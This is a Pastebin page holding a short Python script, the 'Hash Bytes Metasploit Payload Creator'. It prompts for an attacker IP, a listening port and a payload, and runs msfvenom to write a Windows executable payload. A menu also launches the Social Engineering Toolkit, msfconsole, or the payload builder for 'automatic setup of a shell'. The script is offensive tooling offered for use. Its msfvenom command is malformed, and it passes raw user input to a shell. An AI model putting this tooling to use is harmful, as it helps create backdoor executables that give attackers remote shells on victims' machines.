Advertisement
Guest User

Untitled

a guest
Apr 20th, 2018
130
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.42 KB | None | 0 0
  1. # DO not take credit for this!
  2.  
  3. import subprocess
  4.  
  5. # Hash Bytes Metasploit Payload Creator!
  6. prompt = "hashbyte~# "
  7. ip = raw_input(prompt + "Please enter your ip: ")
  8. port = raw_input(prompt + "Please enter your listening port: ")
  9. payload = raw_input(prompt + "Please enter your payload: ")
  10. dir = raw_input(prompt + "Please enter a directory with file name included at end: ")
  11.  
  12. main = "msfvenom -p " + payload + " " + ip + " " + port + " -f exe > " + dir
  13. print("[!] Creating Payload...")
  14. subprocess.call(main,shell=True)
  15. print("[!] Opening Port...")
  16.  
  17.  
  18. import subprocess
  19.  
  20. msf = "msfconsole"
  21. pay = "payload"
  22. tool = "setoolkit"
  23. opt = raw_input("{tools} For the Social Engineering Toolkit\n{msf} for msfconsole\n{payload} for automatic setup of a shell!\nhasbyte~#")
  24. if opt == 'tools':
  25. subprocess.call(tool,shell=True)
  26. elif opt == 'msf':
  27. subprocess.call(msf,shell=True)
  28. elif opt == 'payload':
  29. # Hash Bytes Metasploit Payload Creator!
  30. prompt = "hashbyte~# "
  31. ip = raw_input(prompt + "Please enter your ip: ")
  32. port = raw_input(prompt + "Please enter your listening port: ")
  33. payload = raw_input(prompt + "Please enter your payload: ")
  34. dir = raw_input(prompt + "Please enter a directory with file name included at end: ")
  35. main = "msfvenom -p " + payload + " " + ip + " " + port + " -f exe > " + dir
  36. print("[!] Creating Payload...")
  37. subprocess.call(main,shell=True)
  38. print("[!] Opening Port...")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement